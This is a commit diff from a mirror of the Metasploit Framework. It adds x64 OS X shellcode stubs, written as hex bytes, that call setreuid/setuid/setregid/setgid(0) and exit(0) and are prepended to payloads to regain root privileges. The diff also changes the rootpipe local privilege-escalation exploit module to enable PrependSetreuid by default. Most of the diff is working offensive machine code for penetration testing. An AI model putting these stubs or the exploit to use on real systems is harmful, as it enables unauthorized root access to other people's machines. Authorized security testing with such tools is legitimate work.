infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #5127, x64 OS X prepend stubs 'n' stuff

bug/bundler_fix
William Vu 2015-04-14 01:25:39 -05:00
parent 8d1126eaa5 52fc60b294
commit e114c85044
No known key found for this signature in database
GPG Key ID: 68BD00CE25866743
9 changed files with 157 additions and 101 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
lib/msf/core/payload/linux.rb
View File

@ -87,10 +87,6 @@ module Msf::Payload::Linux
ret ret
end end
#
# Overload the generate() call to prefix our stubs
#
def apply_prepends(buf) def apply_prepends(buf)
pre = '' pre = ''
app = '' app = ''

238
lib/msf/core/payload/osx.rb
View File

@ -23,49 +23,49 @@ module Msf::Payload::Osx
[ [
false, false,
"Prepend a stub that executes the setresuid(0, 0, 0) system call", "Prepend a stub that executes the setresuid(0, 0, 0) system call",
"false" false
] ]
), ),
Msf::OptBool.new('PrependSetreuid', Msf::OptBool.new('PrependSetreuid',
[ [
false, false,
"Prepend a stub that executes the setreuid(0, 0) system call", "Prepend a stub that executes the setreuid(0, 0) system call",
"false" false
] ]
), ),
Msf::OptBool.new('PrependSetuid', Msf::OptBool.new('PrependSetuid',
[ [
false, false,
"Prepend a stub that executes the setuid(0) system call", "Prepend a stub that executes the setuid(0) system call",
"false" false
] ]
), ),
Msf::OptBool.new('PrependSetresgid', Msf::OptBool.new('PrependSetresgid',
[ [
false, false,
"Prepend a stub that executes the setresgid(0, 0, 0) system call", "Prepend a stub that executes the setresgid(0, 0, 0) system call",
"false" false
] ]
), ),
Msf::OptBool.new('PrependSetregid', Msf::OptBool.new('PrependSetregid',
[ [
false, false,
"Prepend a stub that executes the setregid(0, 0) system call", "Prepend a stub that executes the setregid(0, 0) system call",
"false" false
] ]
), ),
Msf::OptBool.new('PrependSetgid', Msf::OptBool.new('PrependSetgid',
[ [
false, false,
"Prepend a stub that executes the setgid(0) system call", "Prepend a stub that executes the setgid(0) system call",
"false" false
] ]
), ),
Msf::OptBool.new('AppendExit', Msf::OptBool.new('AppendExit',
[ [
false, false,
"Append a stub that executes the exit(0) system call", "Append a stub that executes the exit(0) system call",
"false" false
] ]
), ),
], Msf::Payload::Osx) ], Msf::Payload::Osx)
@ -73,95 +73,155 @@ module Msf::Payload::Osx
ret ret
end end
def apply_prepends(buf)
# test_arch = [ *(self.arch) ]
# Overload the generate() call to prefix our stubs
#
def generate(*args)
# Call the real generator to get the payload
buf = super(*args)
pre = '' pre = ''
app = '' app = ''
test_arch = [ *(self.arch) ]
# Handle all x86 code here # Handle all x86 code here
if (test_arch.include?(ARCH_X86)) if (test_arch.include?(ARCH_X86))
handle_x86_osx_opts(pre, app)
# Prepend elsif (test_arch.include?(ARCH_X86_64))
handle_x64_osx_opts(pre, app)
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x66\xb8\x37\x01" +# movw $0x0137,%ax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7e" +# movb $0x7e,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x17" +# movb $0x17,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x66\xb8\x38\x01" +# movw $0x0138,%ax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7f" +# movb $0x7f,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xb5" +# movb $0xb5,%al #
"\xcd\x80" # int $0x80 #
end
# Append
if (datastore['AppendExit'])
# exit(0)
app << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\xb0\x01" +# movb $0x01,%al #
"\xcd\x80" # int $0x80 #
end
end end
return (pre + buf + app) pre + buf + app
end
def handle_x86_osx_opts(pre, app)
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x66\xb8\x37\x01" +# movw $0x0137,%ax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7e" +# movb $0x7e,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x17" +# movb $0x17,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x66\xb8\x38\x01" +# movw $0x0138,%ax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7f" +# movb $0x7f,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xb5" +# movb $0xb5,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['AppendExit'])
# exit(0)
app << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\xb0\x01" +# movb $0x01,%al #
"\xcd\x80" # int $0x80 #
end
end
def handle_x64_osx_opts(pre, app)
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
raise RuntimeError, "setresuid syscall is not implemented on x64 OSX systems"
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" +# shl r8, 24
"\x49\x83\xc8\x7e" +# or r8, 126 (setreuid=126)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x48\x31\xf6" +# xor rsi, rsi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" +# shl r8, 24
"\x49\x83\xc8\x17" +# or r8, 23 (setuid=23)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
raise RuntimeError, "setresgid syscall is not implemented on x64 OSX systems"
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" +# shl r8, 24
"\x49\x83\xc8\x7f" +# or r8, 127 (setregid=127)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x48\x31\xf6" +# xor rsi, rsi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x17" +# shl r8, 23
"\x49\x83\xc8\x5a" +# or r8, 90 (setgid=181>>1=90)
"\x49\xd1\xe0" +# shl r8, 1
"\x49\x83\xc8\x01" +# or r8, 1 (setgid=181&1=1)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
end
if (datastore['AppendExit'])
# exit(0)
app << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" +# shl r8, 24
"\x49\x83\xc8\x01" +# or r8, 1 (exit=1)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
end
end end

4
modules/exploits/osx/local/rootpipe.rb
View File

@ -42,13 +42,13 @@ class Metasploit4 < Msf::Exploit::Local
'Platform' => 'osx', 'Platform' => 'osx',
'Arch' => ARCH_X86_64, 'Arch' => ARCH_X86_64,
'SessionTypes' => ['shell'], 'SessionTypes' => ['shell'],
'Privileged' => true,
'Targets' => [ 'Targets' => [
['Mac OS X 10.9-10.10.2', {}] ['Mac OS X 10.9-10.10.2', {}]
], ],
'DefaultTarget' => 0, 'DefaultTarget' => 0,
'DefaultOptions' => { 'DefaultOptions' => {
'PAYLOAD' => 'osx/x64/shell_reverse_tcp', 'PrependSetreuid' => true
'CMD' => '/bin/zsh'
} }
)) ))

2
modules/payloads/singles/osx/x86/exec.rb
View File

@ -17,7 +17,7 @@ require 'msf/core'
### ###
module Metasploit3 module Metasploit3
CachedSize = 81 CachedSize = 16
include Msf::Payload::Single include Msf::Payload::Single
include Msf::Payload::Osx include Msf::Payload::Osx

2
modules/payloads/singles/osx/x86/shell_bind_tcp.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
module Metasploit3 module Metasploit3
CachedSize = 139 CachedSize = 74
include Msf::Payload::Single include Msf::Payload::Single
include Msf::Payload::Osx include Msf::Payload::Osx

2
modules/payloads/singles/osx/x86/shell_find_port.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
module Metasploit3 module Metasploit3
CachedSize = 126 CachedSize = 61
include Msf::Payload::Single include Msf::Payload::Single
include Msf::Payload::Osx include Msf::Payload::Osx

2
modules/payloads/singles/osx/x86/shell_reverse_tcp.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
module Metasploit3 module Metasploit3
CachedSize = 130 CachedSize = 65
include Msf::Payload::Single include Msf::Payload::Single
include Msf::Payload::Osx include Msf::Payload::Osx

2
modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
module Metasploit3 module Metasploit3
CachedSize = 217 CachedSize = 152
include Msf::Payload::Single include Msf::Payload::Single
include Msf::Payload::Osx include Msf::Payload::Osx

2
modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
module Metasploit3 module Metasploit3
CachedSize = 196 CachedSize = 131
include Msf::Payload::Single include Msf::Payload::Single
include Msf::Payload::Osx include Msf::Payload::Osx